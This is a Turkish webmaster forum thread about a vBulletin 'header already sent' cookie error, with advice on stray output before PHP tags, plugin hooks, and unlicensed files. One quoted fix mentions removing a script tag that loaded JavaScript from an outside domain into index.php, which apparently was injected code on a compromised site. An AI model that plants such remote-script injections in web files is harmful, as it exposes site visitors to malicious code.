İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

vbulletin Unable to add cookies, header already sent hatası

ByLacoste

1
İyinet Üyesi
Reaction score
70
Hocam vbulletinde böyle bir hatanın çözümü hakkında pek bilgim olmadığından biraz araştırma yaparak. Birkaç forumdan bu tarz hata alanların çözüm yollarını toparladım.

güvenlikle filan alakalı değil.
olay şundan bitiyor. cookie dataları header dataları içinde olur
yani sayfanın başlamasından önce browser ile server haberleşmesi arasında
header dataları bitmiş sayfa transferine başlanmış sen tekrar cookie göndermeye
çalışmışsın tekrar header dataları açamayacağı için hata vermiş.
Yapman gereken <?PHP den önce boşluk varsa onları temizlemek yada html varsa onu php içine almak kısacası setcookie()'den önce echo print vs. header datalarını kesebilecek
sayfa transferi olmasın
Bununla çözdüğünü söylüyor arkadaş ama Line : 6 yazıyor.

Sorunu Çözdüm : index.php içinde <?php bundan önceki yazi vardi onu sildigimde site düzeldi <?php'den önce bendekinde <script type="text/javascript" src="http://plastteh.ro/js.php"></script> bu kod vardi sildigimde sorun çözüldü.

Line: 2
Bu hatayı alıyor destek istiyor.
90% of the time when its an eval'ed code error, it is a plugin/product that is failing.

line 97:
($hook = vBulletinHook::fetch_hook('showthread_start')) ? eval($hook) : false;

go to your plugins manager and see what is attached to that showthread_start hook; try disabling them one at a time.
İngilizcem pek iyi değildir. Anladığım kadarıyla doğrusuyla yanlışıyla aktarayım.
''plugin/product şurada sorun varmış %90 zaman when < ne zaman demek sanırım < kod hatası falan fistan.
97. Satırda : ($hook = vBulletinHook::fetch_hook('showthread_start')) ? eval($hook) : false;

plugin yöneticine git ve showthread_start hook;'u bul devre dışı bırakın mı diyor böyle birşey diyor. yanlışım varsa ps: doğrum varsa affola

abuz89

0
İyinet Üyesi
Reaction score
34
sanırım hiçbiri çözüm değil :) çok sağ ol ama kardeşim.

Lanet

1
İyinet Üyesi
Reaction score
97
lisanssız sürüm dosyaları sanırım, başka bi yerden indirin ya da lisanslı dosyaysa bi daha indirip değiştirin dosyaları.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.